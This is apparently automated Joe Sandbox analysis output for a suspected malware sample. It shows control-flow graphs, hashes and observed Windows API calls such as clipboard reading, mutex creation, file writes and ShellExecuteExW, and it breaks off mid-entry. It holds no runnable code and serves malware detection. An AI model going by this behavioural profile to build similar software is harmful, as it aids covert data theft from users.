204 3626550-362656f 197->204 205 362668d-36266a1 197->205 322 36264bd-36264df 198->322 238 3626614-3626636 204->238 217 36266a7-36267a7 205->217 218 36267ee-3626802 205->218 217->218 224 3626808-3626908 218->224 225 362694f-3626963 218->225 224->225 242 3626ab0-3626ada 225->242 243 3626969-3626a69 225->243 249 3626574-3626583 238->249 250 362663c 238->250 264 3626ae0-3626b53 242->264 265 3626b9a-3626bae 242->265 243->242 269 3626589-36265bc 249->269 270 362663e 249->270 250->205 264->265 278 3626bb4-3626c44 265->278 279 3626c8b-3626c9f 265->279 348 3626603-362660c 269->348 349 36265be-36265f8 269->349 289 3626643-362668b 270->289 278->279 287 3626de5-3626df9 279->287 288 3626ca5-3626d9e 279->288 299 3626dff-3626e4f 287->299 300 362705c-3627070 287->300 288->287 289->205 418 3626e51-3626e77 299->418 419 3626ebd-3626ee8 299->419 311 3627076-3627111 call 3624278 * 2 300->311 312 3627158-362715f 300->312 311->312 335 3626402-3626411 322->335 336 36264e5 322->336 356 36264e7 335->356 357 3626417-36264b5 335->357 336->197 348->289 366 362660e 348->366 349->348 375 36264ec-3626534 356->375 357->375 486 36264b7 357->486 366->238 375->197 493 3626eb8 418->493 494 3626e79-3626e99 418->494 488 3626fc6-3627057 419->488 489 3626eee-3626fc1 419->489 486->322 488->300 489->300 496 362536d 491->496 492->496 493->300 494->493 496->108
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$:@%l$:@%l$:@%l$:@%l$@$\OLl$2Ll
              • API String ID: 0-3567625124
              • Opcode ID: db1b8e028a7679f54381dd3ec23b8bede6935108a221cbe35ef5d3cf9d8f10b5
              • Instruction ID: 57b20ae2bdec5c08b8ed13113b606c4c5d44f0d1d8987fbd5430483625026f23
              • Opcode Fuzzy Hash: db1b8e028a7679f54381dd3ec23b8bede6935108a221cbe35ef5d3cf9d8f10b5
              • Instruction Fuzzy Hash: 5A235B74A152288FDB25DF20D895BE9BBB5BB48308F1081E9E5496B3A4CF319E85CF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 555 3624287-36242c9 557 3624352-362435a 555->557 558 36242cf-3624350 555->558 559 3624366-362437a 557->559 558->557 585 362435c 558->585 560 3624380-36243bc 559->560 561 362452f-362467d 559->561 572 36243be-36243e6 560->572 573 36243ed-36244ea 560->573 599 3624683-36247d2 561->599 600 362480d-3624821 561->600 572->573 689 36244ef 573->689 585->559 599->600 601 3624827-3624934 600->601 602 362496f-3624983 600->602 601->602 604 36249d6-36249ea 602->604 605 3624985-362499b call 3624210 602->605 609 3624a32-3624a46 604->609 610 36249ec-36249f7 604->610 605->604 614 3624b94-3624ba8 609->614 615 3624a4c-3624b59 609->615 610->609 617 3624cd4-3624ce8 614->617 618 3624bae-3624bc2 614->618 615->614 622 3624f74-3624f88 617->622 623 3624cee-3624f2d 617->623 626 3624bd0-3624be4 618->626 627 3624bc4-3624bcb 618->627 630 3624fe2-3624ff6 622->630 631 3624f8a-3624f9b 622->631 623->622 628 3624be6-3624bed 626->628 629 3624bef-3624c03 626->629 633 3624c48-3624c5c 627->633 628->633 635 3624c05-3624c0c 629->635 636 3624c0e-3624c22 629->636 639 3625045-3625059 630->639 640 3624ff8-3624ffe 630->640 631->630 642 3624c76-3624c82 633->642 643 3624c5e-3624c74 633->643 635->633 644 3624c24-3624c2b 636->644 645 3624c2d-3624c41 636->645 648 36250a2-36250b6 639->648 649 362505b 639->649 640->639 647 3624c8d 642->647 643->647 644->633 645->633 654 3624c43-3624c45 645->654 647->617 657 36250b8-36250e1 648->657 658 362512d-3625141 648->658 649->648 654->633 657->658 662 3625147-3625363 658->662 663 36253b4-36253c8 658->663 1046 3625367 662->1046 1047 3625365 662->1047 664 362549e-36254b2 663->664 665 36253ce-3625457 663->665 671 36254b8-3625628 664->671 672 362566f-3625683 664->672 665->664 671->672 681 36257e6-36257fa 672->681 682 3625689-362579f 672->682 685 3625800-3625916 681->685 686 362595d-3625971 681->686 682->681 685->686 693 3625977-3625a8d 686->693 694 3625ad4-3625ae8 686->694 689->561 693->694 699 3625c4b-3625c5f 694->699 700 3625aee-3625c04 694->700 706 3625dc2-3625dd6 699->706 707 3625c65-3625d7b 699->707 700->699 713 3625f39-3625f4d 706->713 714 3625ddc-3625ef2 706->714 707->706 719 3625f53-3626069 713->719 720 36260b0-36260c4 713->720 714->713 719->720 728 3626227-362623b 720->728 729 36260ca-36261e0 720->729 737 3626241-3626357 728->737 738 362639e-36263b2 728->738 729->728 737->738 752 3626536-362654a 738->752 753 36263b8-36263fd call 3624278 738->753 759 3626550-362656f 752->759 760 362668d-36266a1 752->760 877 36264bd-36264df 753->877 793 3626614-3626636 759->793 772 36266a7-36267a7 760->772 773 36267ee-3626802 760->773 772->773 779 3626808-3626908 773->779 780 362694f-3626963 773->780 779->780 797 3626ab0-3626ada 780->797 798 3626969-3626a69 780->798 804 3626574-3626583 793->804 805 362663c 793->805 819 3626ae0-3626b53 797->819 820 3626b9a-3626bae 797->820 798->797 824 3626589-36265bc 804->824 825 362663e 804->825 805->760 819->820 833 3626bb4-3626c44 820->833 834 3626c8b-3626c9f 820->834 903 3626603-362660c 824->903 904 36265be-36265f8 824->904 844 3626643-362668b 825->844 833->834 842 3626de5-3626df9 834->842 843 3626ca5-3626d9e 834->843 854 3626dff-3626e4f 842->854 855 362705c-3627070 842->855 843->842 844->760 973 3626e51-3626e77 854->973 974 3626ebd-3626ee8 854->974 866 3627076-3627111 call 3624278 * 2 855->866 867 3627158-362715f 855->867 866->867 890 3626402-3626411 877->890 891 36264e5 877->891 911 36264e7 890->911 912 3626417-36264b5 890->912 891->752 903->844 921 362660e 903->921 904->903 930 36264ec-3626534 911->930 912->930 1041 36264b7 912->1041 921->793 930->752 1048 3626eb8 973->1048 1049 3626e79-3626e99 973->1049 1043 3626fc6-3627057 974->1043 1044 3626eee-3626fc1 974->1044 1041->877 1043->855 1044->855 1051 362536d 1046->1051 1047->1051 1048->855 1049->1048 1051->663
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-4176283887
              • Opcode ID: 2d4017da75c0f6bc94e3e2d862fc2d2800942b0f5cbb340e54ba0586de3367e9
              • Instruction ID: 2f7c3b92d75bf96fc318030bf73a673b3b68a532639dcadeec4225770634ecbe
              • Opcode Fuzzy Hash: 2d4017da75c0f6bc94e3e2d862fc2d2800942b0f5cbb340e54ba0586de3367e9
              • Instruction Fuzzy Hash: CB133B74A151288FDB25DF20D895BE9BBB5FB48304F1081EAE9496B3A4CF319E85CF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1169 36237e1-3623911 1186 3623913 1169->1186 1187 3623917-3623919 1169->1187 1188 3623915 1186->1188 1189 362391b 1186->1189 1190 3623920-3623927 1187->1190 1188->1187 1189->1190 1191 36239bd-3623adf 1190->1191 1192 362392d-36239b2 1190->1192 1216 3623ae1-3623b51 1191->1216 1217 3623b5b-3623bae 1191->1217 1192->1191 1216->1217 1224 3623bb0 1217->1224 1225 3623bb5 1217->1225 1224->1225 1305 3623bb5 call 4150606 1225->1305 1306 3623bb5 call 3624287 1225->1306 1307 3623bb5 call 3624298 1225->1307 1308 3623bb5 call 41505df 1225->1308 1227 3623bbb-3623bcf 1228 3623bd1-3623bfb 1227->1228 1229 3623c06-3623cbb 1227->1229 1228->1229 1240 3623d43 1229->1240 1241 3623cc1-3623cff 1229->1241 1242 36241dd-36241e8 1240->1242 1241->1240 1243 3623d48-3623d66 1242->1243 1244 36241ee-36241f5 1242->1244 1248 3623d71-3623d7c 1243->1248 1249 3623d68-3623d6e 1243->1249 1252 3623d82-3623d96 1248->1252 1253 3624193-36241db 1248->1253 1249->1248 1255 3623d98-3623dca 1252->1255 1256 3623e0e-3623e1f 1252->1256 1253->1242 1255->1256 1258 3623e21-3623e4b 1256->1258 1259 3623e6f-3623e7d 1256->1259 1258->1259 1269 3623e4d-3623e67 1258->1269 1261 3623e83-3623f36 1259->1261 1262 3624191 1259->1262 1282 3623fc6-36240bd 1261->1282 1283 3623f3c-3623fbf 1261->1283 1262->1242 1269->1259 1298 36240c3-3624146 1282->1298 1299 362414d 1282->1299 1283->1282 1298->1299 1299->1262 1305->1227 1306->1227 1307->1227 1308->1227
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: \OLl$2Ll
              • API String ID: 0-1463305755
              • Opcode ID: 164bbe2407f939f9cd6ea59a21a6f703e88426c1cc02e1a5733d3026dcbe15cc
              • Instruction ID: c89e37da7c0c8171675fbd2787652dc95138aae37744fd11c664de43269ac27b
              • Opcode Fuzzy Hash: 164bbe2407f939f9cd6ea59a21a6f703e88426c1cc02e1a5733d3026dcbe15cc
              • Instruction Fuzzy Hash: 7B325634A00229CFDB14DF74D855BEDBBB2AF49308F1085A9E409AB3A4DB759E85CF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1309 36200b8-36200cd 1331 36200d0 call 4150606 1309->1331 1332 36200d0 call 41505df 1309->1332 1333 36200d0 call 350a23a 1309->1333 1334 36200d0 call 350a20c 1309->1334 1311 36200d5-36200f7 1314 362010b-36201d5 1311->1314 1315 36200f9-362010a 1311->1315 1335 36201d5 call 36237e1 1314->1335 1336 36201d5 call 4150606 1314->1336 1337 36201d5 call 41505df 1314->1337 1338 36201d5 call 3623b18 1314->1338 1339 36201d5 call 36239bf 1314->1339 1330 36201db-36201de 1331->1311 1332->1311 1333->1311 1334->1311 1335->1330 1336->1330 1337->1330 1338->1330 1339->1330
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll
              • API String ID: 0-1498689491
              • Opcode ID: abe7ffbe682624b2ff665da092cf9877f39d18092e40f8357cbfa67ad6e6db4d
              • Instruction ID: 0687c200e7ebdf47c15c077acf2bd60c1fce456321f0abe7f19f9fc1da19540f
              • Opcode Fuzzy Hash: abe7ffbe682624b2ff665da092cf9877f39d18092e40f8357cbfa67ad6e6db4d
              • Instruction Fuzzy Hash: B031E2357043409FD704EB75D861FAE7BA6ABC2218F0584AED4018F7A1CF769C0AC7A2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1340 3620118-3620169 1345 3620174-362017a 1340->1345 1346 3620181-36201bd 1345->1346 1351 36201c8-36201d5 1346->1351 1354 36201d5 call 36237e1 1351->1354 1355 36201d5 call 4150606 1351->1355 1356 36201d5 call 41505df 1351->1356 1357 36201d5 call 3623b18 1351->1357 1358 36201d5 call 36239bf 1351->1358 1353 36201db-36201de 1354->1353 1355->1353 1356->1353 1357->1353 1358->1353
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll
              • API String ID: 0-1498689491
              • Opcode ID: 741c018f6b8cd4132559848b2d63db8e2069779a665b86823d5119f97e35768d
              • Instruction ID: 3fec9356601a025a5169f15861f08b4d7b64f1a45ac227f38f18e1aef1d47015
              • Opcode Fuzzy Hash: 741c018f6b8cd4132559848b2d63db8e2069779a665b86823d5119f97e35768d
              • Instruction Fuzzy Hash: B21182357442408FC704EB79E461EAE7BAAABC6309744856ED4418FB64CF769C0AC7E2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1359 350aa75-350aafe 1363 350ab00 1359->1363 1364 350ab03-350ab0f 1359->1364 1363->1364 1365 350ab11 1364->1365 1366 350ab14-350ab1d 1364->1366 1365->1366 1367 350ab6e-350ab73 1366->1367 1368 350ab1f-350ab43 CreateFileW 1366->1368 1367->1368 1371 350ab75-350ab7a 1368->1371 1372 350ab45-350ab6b 1368->1372 1371->1372
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0350AB25
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e111a463931cfb60282bcbc0ac226336297ce641e9f66174f1153ab91dbc8f59
              • Instruction ID: 5ded12f7d1605f0deb1cfa7983b4f403b9d061198d342ca7f463586c4d47c4a8
              • Opcode Fuzzy Hash: e111a463931cfb60282bcbc0ac226336297ce641e9f66174f1153ab91dbc8f59
              • Instruction Fuzzy Hash: 16318075504380AFE722CF25DC85F56FFF8EF05210F08889AE9858B6A2D365E808CB71

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1375 350b036-350b0b9 1379 350b0bb 1375->1379 1380 350b0be-350b0c7 1375->1380 1379->1380 1381 350b0c9 1380->1381 1382 350b0cc-350b0d5 1380->1382 1381->1382 1383 350b126-350b12b 1382->1383 1384 350b0d7-350b0fb CreateMutexW 1382->1384 1383->1384 1387 350b12d-350b132 1384->1387 1388 350b0fd-350b123 1384->1388 1387->1388
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0350B0DD
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 6024ab1bbb2bb2d0c321a81921364d21be0530c2646fbcf2ab66b28b532738e7
              • Instruction ID: f348532a34dbff9daa13e9f7abc12fe011a5f3c64b0039c4e9f99ba1d6d5465c
              • Opcode Fuzzy Hash: 6024ab1bbb2bb2d0c321a81921364d21be0530c2646fbcf2ab66b28b532738e7
              • Instruction Fuzzy Hash: E13191B55093806FE711CB25DC95F96FFB8EF06214F08849AE984CB2A2D365E909C772

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1391 350a6ce-350a72b 1392 350a72e-350a786 OleGetClipboard 1391->1392 1394 350a78c-350a7a2 1392->1394
              APIs
              • OleGetClipboard.OLE32(?,00000E90,?,?), ref: 0350A77E
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: Clipboard
              • String ID:
              • API String ID: 220874293-0
              • Opcode ID: 663297bf609107e865277d64ffed8947f01497acaf5f3577aa06221b1667bec8
              • Instruction ID: c0d0a9856c64b16af80b000a5523f59ef34d5d10acd0f4b39cf25453db6373cd
              • Opcode Fuzzy Hash: 663297bf609107e865277d64ffed8947f01497acaf5f3577aa06221b1667bec8
              • Instruction Fuzzy Hash: 5431A07510D3C06FD3138B259C61B62BFB8EF87614F0A40CBE884CB6A3C2296919D772

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1395 350ae77-350af05 1399 350af07-350af27 WriteFile 1395->1399 1400 350af49-350af4e 1395->1400 1403 350af50-350af55 1399->1403 1404 350af29-350af46 1399->1404 1400->1399 1403->1404
              APIs
              • WriteFile.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350AF0D
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 83f8f1dc82eb91767eea9906959a7c6ad078500e6ddbcf9d4029d4838eed77c7
              • Instruction ID: 7aaba02f6ead0ba5c18c02af91b8748202edf30a5c8a955339681bd7543b1c10
              • Opcode Fuzzy Hash: 83f8f1dc82eb91767eea9906959a7c6ad078500e6ddbcf9d4029d4838eed77c7
              • Instruction Fuzzy Hash: 2321D3B6408380AFDB22CF21DC44F96BFB8EF06314F0984DAE9849F162D265A509CB71

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1407 350aaa6-350aafe 1410 350ab00 1407->1410 1411 350ab03-350ab0f 1407->1411 1410->1411 1412 350ab11 1411->1412 1413 350ab14-350ab1d 1411->1413 1412->1413 1414 350ab6e-350ab73 1413->1414 1415 350ab1f-350ab27 CreateFileW 1413->1415 1414->1415 1416 350ab2d-350ab43 1415->1416 1418 350ab75-350ab7a 1416->1418 1419 350ab45-350ab6b 1416->1419 1418->1419
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0350AB25
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: de2d9c2fb8f64d526a0b806bdd4e8744e3068a999af88c723d67f84c666e0590
              • Instruction ID: f835366280a234ec37611a4a050f042d68399db4bc39f58714e59a68a069b1c9
              • Opcode Fuzzy Hash: de2d9c2fb8f64d526a0b806bdd4e8744e3068a999af88c723d67f84c666e0590
              • Instruction Fuzzy Hash: 72218175600340AFEB21CF65DC85F66FBE8FF04214F08899AE9458B6A1D776E408CB72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1433 350ac37-350acb5 1437 350acb7-350acca GetFileType 1433->1437 1438 350acea-350acef 1433->1438 1439 350acf1-350acf6 1437->1439 1440 350accc-350ace9 1437->1440 1438->1437 1439->1440
              APIs
              • GetFileType.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350ACBD
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 3ad5edd15a94103b1eb6042e1934958407f90aafb505e9886cdb2b3a5b8be6f7
              • Instruction ID: 7ec9d424d1cc70cbcaf4dd24d191a17ec758313194c8229a6866a81ef342590e
              • Opcode Fuzzy Hash: 3ad5edd15a94103b1eb6042e1934958407f90aafb505e9886cdb2b3a5b8be6f7
              • Instruction Fuzzy Hash: 6521D8B55083806FE712CB11DC41BA2BFBCEF42314F0980D7F9848B2A3D264A909D772

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1422 350a9bf-350aa3c 1427 350aa67-350aa6c 1422->1427 1428 350aa3e-350aa51 SetErrorMode 1422->1428 1427->1428 1429 350aa53-350aa66 1428->1429 1430 350aa6e-350aa73 1428->1430 1430->1429
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 0350AA44
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 5fc1734d3f9fc462c440cd48605278659e8d0ddbe1e62cf99a8d8cfc251bad0d
              • Instruction ID: cb5eb596a097101af6200e15f6876a49e5cc46685f6138524127c61de475a607
              • Opcode Fuzzy Hash: 5fc1734d3f9fc462c440cd48605278659e8d0ddbe1e62cf99a8d8cfc251bad0d
              • Instruction Fuzzy Hash: 7E21456540E3C0AFDB138B259C64A51BF74AF53624F0E80DBD884CF6A3D2699948CB72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1444 350b06a-350b0b9 1447 350b0bb 1444->1447 1448 350b0be-350b0c7 1444->1448 1447->1448 1449 350b0c9 1448->1449 1450 350b0cc-350b0d5 1448->1450 1449->1450 1451 350b126-350b12b 1450->1451 1452 350b0d7-350b0df CreateMutexW 1450->1452 1451->1452 1453 350b0e5-350b0fb 1452->1453 1455 350b12d-350b132 1453->1455 1456 350b0fd-350b123 1453->1456 1455->1456
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0350B0DD
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 4ece75e70cf404c6f3e7ee83ff4c70703722eb5ff04dee5d4c91464f0cacc7b4
              • Instruction ID: 66079098908e437a42ad2507fa16ef8588d398869b0e17051bdd068721ed7840
              • Opcode Fuzzy Hash: 4ece75e70cf404c6f3e7ee83ff4c70703722eb5ff04dee5d4c91464f0cacc7b4
              • Instruction Fuzzy Hash: 6E2195756042409FEB10CF25DD85FA6F7E8EF04214F0888AAE9498B791D776E509CB72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1459 350a61e-350a688 1461 350a6c0-350a6c5 1459->1461 1462 350a68a-350a692 OleInitialize 1459->1462 1461->1462 1463 350a698-350a6aa 1462->1463 1465 350a6c7-350a6cc 1463->1465 1466 350a6ac-350a6bf 1463->1466 1465->1466
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              • Opcode ID: 0df93620e45bd10020d89843ec54f4929796671af9b0c592b30baec4d3820930
              • Instruction ID: 2749e5574ba794b0bb071bde5f2fe5a8c48fe9c9915c006b1894e5eca957c154
              • Opcode Fuzzy Hash: 0df93620e45bd10020d89843ec54f4929796671af9b0c592b30baec4d3820930
              • Instruction Fuzzy Hash: 2821277180D3C09FDB138B25DC95A52BFB4AF07224F0984DBD9849F1A3D2699908DBB2
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0350A5DE
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: d81232f62070e24ad898a5d7a5aa2d0117ee26f97f567bfa6cb607feffb12f28
              • Instruction ID: b0062a0f25a70d4eb881eb863ca96cb1ccf858c7b842a2a02a2a29699503c3c6
              • Opcode Fuzzy Hash: d81232f62070e24ad898a5d7a5aa2d0117ee26f97f567bfa6cb607feffb12f28
              • Instruction Fuzzy Hash: F6118472409380AFDB22CF51DC44B62FFB8EF46310F0C88DAED858B562D276A518DB61
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 0350B480
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: ExecuteShell
              • String ID:
              • API String ID: 587946157-0
              • Opcode ID: 92f40a792bd37a1ce25b9cd1d13a2850a284356e9ce9ff440df42b4230f5250c
              • Instruction ID: 31e685edee55f387f7e4b731c5979a7399323b4ca2709e0141eca89120790f0d
              • Opcode Fuzzy Hash: 92f40a792bd37a1ce25b9cd1d13a2850a284356e9ce9ff440df42b4230f5250c
              • Instruction Fuzzy Hash: 3D1186755093809FD712CF25DC95B52BFB8EF46210F0884EBED49CF262D265E548C761
              APIs
              • WriteFile.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350AF0D
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 44cc0abca45035d01ed98aa8bcd2d5f6ed8223a4ea672fe2bb03970cc4103e8b
              • Instruction ID: 17810984f6343464a9ba159f4d6b5e4edce6dedf735b6b522ab85b4cab963d1f
              • Opcode Fuzzy Hash: 44cc0abca45035d01ed98aa8bcd2d5f6ed8223a4ea672fe2bb03970cc4103e8b
              • Instruction Fuzzy Hash: E311C476500300AFEB21CF51EC85FA6FBACEF04314F08889AED459B661D375A508CBB2
              APIs
              • GetFileType.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350ACBD
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 16663502c6c097151ca9dbafcacf17e0465827291a3b9436d84bfeb166873e03
              • Instruction ID: 1181ab35074c99eeda1d9c59592478ec1096276df18a46a843297aefc5175612
              • Opcode Fuzzy Hash: 16663502c6c097151ca9dbafcacf17e0465827291a3b9436d84bfeb166873e03
              • Instruction Fuzzy Hash: 3B01C475500300AFEB10CF05EC85BA6FB9CEF44624F088496FD048B7A1D365A5488AB2
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 0350B480
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: ExecuteShell
              • String ID:
              • API String ID: 587946157-0
              • Opcode ID: d17750c252b3998b04df225dde53a69f0df261e7446c4f752ecf5cd439b8b11e
              • Instruction ID: 1a38920bb343c2a2deb4e28d72c4c924949561549e798385584736ba0c73b033
              • Opcode Fuzzy Hash: d17750c252b3998b04df225dde53a69f0df261e7446c4f752ecf5cd439b8b11e
              • Instruction Fuzzy Hash: 8F0180355042409FDB50CF15E8C5B56FBA8EF00224F08C4AADD49CB6A2D275E548CB61
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0350A5DE
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 59024f095c1957df4a6d06098665aeee94435e6cbb320684b395fd6e84af56db
              • Instruction ID: 63e8445b7fd8f60518820d6ddf1f5f7bf43634bdbee753f223c9662e747fd322
              • Opcode Fuzzy Hash: 59024f095c1957df4a6d06098665aeee94435e6cbb320684b395fd6e84af56db
              • Instruction Fuzzy Hash: A3015B368007409FDF21CF55E885B56FFB4FF48220F08899AEE494A661D376A458DBA2
              APIs
              • OleGetClipboard.OLE32(?,00000E90,?,?), ref: 0350A77E
              Memory Dump Source
              • Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd
              Similarity
              • API ID: Clipboard
              • String ID:
              • API String ID: 220874293-0
              • Opcode ID: c783c671a8bc2a767eb791504c4b37df2c472bb6927bcda9c01998ad8aa9274e
              • Instruction ID: 567f67e0c5592e893f96f51425ee9dec879eaedbccb6322a3e7173079320ce31
              • Opcode Fuzzy Hash: c783c671a8bc2a767eb791504c4b37df2c472bb6927bcda9c01998ad8aa9274e
              • Instruction Fuzzy Hash: 9F01D671600600AFD310DF16DC86B76FBA8FB88A20F14815AEC089BB41D771F556CBE6
              APIs
              Memory Dump Source
